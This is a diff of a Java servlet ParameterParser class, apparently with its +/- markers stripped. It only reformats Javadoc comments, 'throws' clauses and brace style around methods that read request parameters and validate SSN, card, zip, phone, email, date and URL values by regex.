public String getIPParameter(String name, String def)
@ -359,15 +367,15 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as an IP String
*
*@param name the parameter name
*@return the parameter value as a valid IP
* String or an Empty string if invalid
*@exception ParameterNotFoundException if the parameter was not found or was
* the empty string
* @param name
* the parameter name
* @return the parameter value as a valid IP String or an Empty string if
* invalid
* @exception ParameterNotFoundException
* if the parameter was not found or was the empty string
*/
public String getIPParameter(String name) throws ParameterNotFoundException
{
@ -378,12 +386,10 @@ public class ParameterParser
if (values == null)
{
throw new ParameterNotFoundException(name + " not found");
}
else if (values[0].length() == 0)
} else if (values[0].length() == 0)
{
throw new ParameterNotFoundException(name + " was empty");
}
else
} else
{
// trim illegal characters
value = clean(values[0].trim());
@ -432,8 +438,7 @@ public class ParameterParser
octetCount++;
}
}
else
} else
{
// Not a valid IP
valid = false;
@ -450,29 +455,30 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a int
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a int
*@exception ParameterNotFoundException if the parameter was not found
*@exception NumberFormatException if the parameter could not be
* converted to a int
* @exception ParameterNotFoundException
* if the parameter was not found
* @exception NumberFormatException
* if the parameter could not be converted to a int
*/
public int getIntParameter(String name) throws ParameterNotFoundException,
NumberFormatException
public int getIntParameter(String name) throws ParameterNotFoundException, NumberFormatException
{
return Integer.parseInt(getStringParameter(name));
}
/**
* Gets the named parameter value as a int, with a default. Returns the
* default value if the parameter is not found.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a int, or the default
*/
public int getIntParameter(String name, int def)
@ -487,29 +493,30 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a long
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a long
*@exception ParameterNotFoundException if the parameter was not found
*@exception NumberFormatException if the parameter could not be
* converted to a long
* @exception ParameterNotFoundException
* if the parameter was not found
* @exception NumberFormatException
* if the parameter could not be converted to a long
*/
public long getLongParameter(String name)
throws ParameterNotFoundException, NumberFormatException
public long getLongParameter(String name) throws ParameterNotFoundException, NumberFormatException
{
return Long.parseLong(getStringParameter(name));
}
/**
* Gets the named parameter value as a long, with a default. Returns the
* default value if the parameter is not found.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a long, or the default
*/
public long getLongParameter(String name, long def)
@ -524,14 +531,13 @@ public class ParameterParser
}
}
/**
* Determines which of the required parameters were missing from the request.
* Returns null if all the parameters are present.
* Determines which of the required parameters were missing from the
* request. Returns null if all the parameters are present.
*
*@param requestuired Description of the Parameter
*@return an array of missing parameters, or null if none are
* missing
* @param requestuired
* Description of the Parameter
* @return an array of missing parameters, or null if none are missing
*/
public String[] getMissingParameters(String[] requestuired)
{
@ -550,8 +556,7 @@ public class ParameterParser
if (missing.size() == 0)
{
return null;
}
else
} else
{
String[] ret = new String[missing.size()];
missing.copyInto(ret);
@ -560,7 +565,6 @@ public class ParameterParser
}
}
/**
* Gets the parameterNames attribute of the ParameterParser object
*
@ -576,11 +580,11 @@ public class ParameterParser
return request.getParameterNames();
}
/**
* Gets the parameterValues attribute of the ParameterParser object
*
*@param name Description of the Parameter
* @param name
* Description of the Parameter
* @return The parameterValues value
*/
public String[] getParameterValues(String name)
@ -593,12 +597,13 @@ public class ParameterParser
return request.getParameterValues(name);
}
/**
* Gets the rawParameter attribute of the ParameterParser object
*
*@param name Description of the Parameter
*@param def Description of the Parameter
* @param name
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The rawParameter value
*/
public String getRawParameter(String name, String def)
@ -613,24 +618,23 @@ public class ParameterParser
}
}
/**
* Gets the rawParameter attribute of the ParameterParser object
*
*@param name Description of the Parameter
* @param name
* Description of the Parameter
* @return The rawParameter value
*@exception ParameterNotFoundException Description of the Exception
* @exception ParameterNotFoundException
* Description of the Exception
*/
public String getRawParameter(String name)
throws ParameterNotFoundException
public String getRawParameter(String name) throws ParameterNotFoundException
{
String[] values = request.getParameterValues(name);
if (values == null)
{
throw new ParameterNotFoundException(name + " not found");
}
else if (values[0].length() == 0)
} else if (values[0].length() == 0)
{
throw new ParameterNotFoundException(name + " was empty");
}
@ -638,29 +642,30 @@ public class ParameterParser
return (values[0]);
}
/**
* Gets the named parameter value as a short
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a short
*@exception ParameterNotFoundException if the parameter was not found
*@exception NumberFormatException if the parameter could not be
* converted to a short
* @exception ParameterNotFoundException
* if the parameter was not found
* @exception NumberFormatException
* if the parameter could not be converted to a short
*/
public short getShortParameter(String name)
throws ParameterNotFoundException, NumberFormatException
public short getShortParameter(String name) throws ParameterNotFoundException, NumberFormatException
{
return Short.parseShort(getStringParameter(name));
}
/**
* Gets the named parameter value as a short, with a default. Returns the
* default value if the parameter is not found.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a short, or the default
*/
public short getShortParameter(String name, short def)
@ -675,17 +680,16 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a String
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a String
*@exception ParameterNotFoundException if the parameter was not found or was
* the empty string
* @exception ParameterNotFoundException
* if the parameter was not found or was the empty string
*/
public String getStringParameter(String name)
throws ParameterNotFoundException
public String getStringParameter(String name) throws ParameterNotFoundException
{
String[] values = request.getParameterValues(name);
String value;
@ -693,12 +697,10 @@ public class ParameterParser
if (values == null)
{
throw new ParameterNotFoundException(name + " not found");
}
else if (values[0].length() == 0)
} else if (values[0].length() == 0)
{
throw new ParameterNotFoundException(name + " was empty");
}
else
} else
{
// trim illegal characters
value = clean(values[0].trim());
@ -713,13 +715,14 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a String, with a default. Returns the
* default value if the parameter is not found or is the empty string.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a String, or the default
*/
public String getStringParameter(String name, String def)
@ -734,13 +737,15 @@ public class ParameterParser
}
}
/**
* Gets the subParameter attribute of the ParameterParser object
*
*@param first Description of the Parameter
*@param next Description of the Parameter
*@param def Description of the Parameter
* @param first
* Description of the Parameter
* @param next
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The subParameter value
*/
public String getSubParameter(String first, String next, String def)
@ -755,18 +760,19 @@ public class ParameterParser
}
}
/**
* Gets the parameter named 'next' following the parameter 'first'. Presumes
* the structure: first=firstvalue&next=nextValue
*
*@param first Description of the Parameter
*@param next Description of the Parameter
* @param first
* Description of the Parameter
* @param next
* Description of the Parameter
* @return The subParameter value
*@exception ParameterNotFoundException Description of the Exception
* @exception ParameterNotFoundException
* Description of the Exception
*/
public String getSubParameter(String first, String next)
throws ParameterNotFoundException
public String getSubParameter(String first, String next) throws ParameterNotFoundException
{
String[] values = request.getParameterValues(first);
String value;
@ -774,12 +780,10 @@ public class ParameterParser
if (values == null)
{
throw new ParameterNotFoundException(first + " not found");
}
else if (values[0].length() == 0)
} else if (values[0].length() == 0)
{
throw new ParameterNotFoundException(first + " was empty");
}
else
} else
{
value = clean(values[0].trim());
@ -793,10 +797,12 @@ public class ParameterParser
value = value.substring(idx);
//System.out.println("= = = = = =Parameter parser looking for " + next + " in " + value );
// System.out.println("= = = = = =Parameter parser looking for " +
// next + " in " + value );
int nextValueIndex = value.indexOf(next + "=");
//System.out.println("= = = = = =Parameter parser nextValueIndex = " + nextValueIndex );
// System.out.println("= = = = = =Parameter parser nextValueIndex =
// " + nextValueIndex );
if (nextValueIndex < 0)
{
throw new ParameterNotFoundException("No subparameter value");
@ -807,8 +813,7 @@ public class ParameterParser
if (nextValueIndex >= 0)
{
value = value.substring(nextValueIndex);
}
else
} else
{
throw new ParameterNotFoundException(next + " not found");
}
@ -820,19 +825,19 @@ public class ParameterParser
value = value.substring(0, value.indexOf("&"));
}
//System.out.println("=-=-=-=-=ParameterParser returning value " + value );
// System.out.println("=-=-=-=-=ParameterParser returning value " +
// value );
return value;
}
/**
* Gets the wordParameter attribute of the ParameterParser object
*
*@param name Description of the Parameter
* @param name
* Description of the Parameter
* @return The wordParameter value
*/
public String getWordParameter(String name)
throws ParameterNotFoundException
public String getWordParameter(String name) throws ParameterNotFoundException
{
String p = getStringParameter(name);
StringTokenizer st = new StringTokenizer(p);
@ -840,14 +845,15 @@ public class ParameterParser
return (st.nextToken().trim());
}
// FIXME: check for [a-zA-Z]
/**
* Gets the wordParameter attribute of the ParameterParser object
*
*@param name Description of the Parameter
*@param def Description of the Parameter
* @param name
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The wordParameter value
*/
public String getWordParameter(String name, String def)
@ -862,18 +868,22 @@ public class ParameterParser
}
}
/**
* Gets the specified parameter from the request and validates it against the provided regular expression.
* If the regular expression check fails, the default value is returned instead.
* Gets the specified parameter from the request and validates it against
* the provided regular expression. If the regular expression check fails,
* the default value is returned instead.
*
*@param name The name of the parameter to retrieve from the request.
*@param def The default value of the parameter.
*@param regexpattern The precompiled regular expression to be used to validate the parameter.
*@return The validated parameter value, or the default value if validation failed.
* @param name
* The name of the parameter to retrieve from the request.
* @param def
* The default value of the parameter.
* @param regexpattern
* The precompiled regular expression to be used to validate the
* parameter.
* @return The validated parameter value, or the default value if validation
* failed.
*/
private String getRegexParameter(String name, String def,
Pattern regexpattern) throws ValidationException
private String getRegexParameter(String name, String def, Pattern regexpattern) throws ValidationException
{
try
{
@ -887,35 +897,38 @@ public class ParameterParser
}
}
/**
* Gets the specified parameter from the request and validates it against the provided regular expression.
* If the regular expression check fails, the default value is returned instead.
* Gets the specified parameter from the request and validates it against
* the provided regular expression. If the regular expression check fails,
* the default value is returned instead.
*
*@param name The name of the parameter to retrieve from the request.
*@param def The default value of the parameter.
*@param regexpattern The precompiled regular expression to be used to validate the parameter.
*@return The validated parameter value, or the default value if validation failed.
* @param name
* The name of the parameter to retrieve from the request.
* @param def
* The default value of the parameter.
* @param regexpattern
* The precompiled regular expression to be used to validate the
* parameter.
* @return The validated parameter value, or the default value if validation
* failed.
*/
private String getRegexParameter(String name, Pattern regexpattern)
throws ParameterNotFoundException, ValidationException
private String getRegexParameter(String name, Pattern regexpattern) throws ParameterNotFoundException,
ValidationException
{
String param = getStringParameter(name);
if (regexpattern.matcher(param).matches())
{
return param;
}
else
} else
{
// System.out.println(param + " didn't match defined pattern.");
throw new ValidationException(name + " contained an invalid value");
}
}
public String getStrictAlphaParameter(String name, int maxLength)
throws ParameterNotFoundException, ValidationException
public String getStrictAlphaParameter(String name, int maxLength) throws ParameterNotFoundException,
ValidationException
{
String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$";
Pattern alphaPattern = Pattern.compile(alphaRegEx);
@ -923,9 +936,8 @@ public class ParameterParser
return getRegexParameter(name, alphaPattern);
}
public String getStrictNumericParameter(String name, int maxLength)
throws ParameterNotFoundException, ValidationException
public String getStrictNumericParameter(String name, int maxLength) throws ParameterNotFoundException,
ValidationException
{
String numericRegEx = "^\\d{0," + maxLength + "}$";
Pattern numericPattern = Pattern.compile(numericRegEx);
@ -937,22 +949,20 @@ public class ParameterParser
private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX);
public String getSsnParameter(String name)
throws ParameterNotFoundException, ValidationException
public String getSsnParameter(String name) throws ParameterNotFoundException, ValidationException
{
return getRegexParameter(name, Ssnpattern);
}
// Validates format for major brands of credit card.
//private static final String CCNREGEX = "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([ -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
// private static final String CCNREGEX =
// "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([
// -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
private static final String CCNREGEX = "^\\d{16}$";
private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);
public String getCcnParameter(String name)
throws ParameterNotFoundException, ValidationException
public String getCcnParameter(String name) throws ParameterNotFoundException, ValidationException
{
return getRegexParameter(name, Ccnpattern);
}
@ -961,16 +971,12 @@ public class ParameterParser
private static final Pattern Zippattern = Pattern.compile(ZIPREGEX);
public String getZipParameter(String name)
throws ParameterNotFoundException, ValidationException
public String getZipParameter(String name) throws ParameterNotFoundException, ValidationException
{
return getZipParameter(name, null);
}
public String getZipParameter(String name, String def)
throws ValidationException
public String getZipParameter(String name, String def) throws ValidationException
{
return getRegexParameter(name, def, Zippattern);
}
@ -981,16 +987,12 @@ public class ParameterParser
// private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$";
private static final Pattern phonepattern = Pattern.compile(PHONEREGEX);
public String getPhoneParameter(String name)
throws ParameterNotFoundException, ValidationException
public String getPhoneParameter(String name) throws ParameterNotFoundException, ValidationException
{
return getPhoneParameter(name, null);
}
public String getPhoneParameter(String name, String def)
throws ValidationException
public String getPhoneParameter(String name, String def) throws ValidationException
{
return getRegexParameter(name, def, phonepattern);
}
@ -999,16 +1001,12 @@ public class ParameterParser
private static final Pattern emailpattern = Pattern.compile(EMAILREGEX);
public String getEMailParameter(String name)
throws ParameterNotFoundException, ValidationException
public String getEMailParameter(String name) throws ParameterNotFoundException, ValidationException
{
return getEMailParameter(name, null);
}
public String getEMailParameter(String name, String def)
throws ValidationException
public String getEMailParameter(String name, String def) throws ValidationException
{
return getRegexParameter(name, def, emailpattern);
}
@ -1017,45 +1015,36 @@ public class ParameterParser
private static final Pattern datepattern = Pattern.compile(DATEREGEX);
public String getDateParameter(String name)
throws ParameterNotFoundException, ValidationException
public String getDateParameter(String name) throws ParameterNotFoundException, ValidationException
{
return getDateParameter(name, null);
}
public String getDateParameter(String name, String def)
throws ValidationException
public String getDateParameter(String name, String def) throws ValidationException
{
return getRegexParameter(name, def, datepattern);
}
private static final String URLREGEX = "^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
private static final String URLREGEX =
"^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
private static final Pattern URLpattern = Pattern.compile(URLREGEX);
public String getURLParameter(String name)
throws ParameterNotFoundException, ValidationException
public String getURLParameter(String name) throws ParameterNotFoundException, ValidationException
{
return getURLParameter(name, null);
}
public String getURLParameter(String name, String def)
throws ValidationException
public String getURLParameter(String name, String def) throws ValidationException
{
return getRegexParameter(name, def, URLpattern);
}
protected static String htmlEncode(String s)
{
return HtmlEncoder.encode(s);
}
/**
* Description of the Method
*
@ -1083,11 +1072,11 @@ public class ParameterParser
return (s.toString());
}
/**
* Description of the Method
*
*@param request Description of the Parameter
* @param request
* Description of the Parameter
*/
public void update(ServletRequest request)
{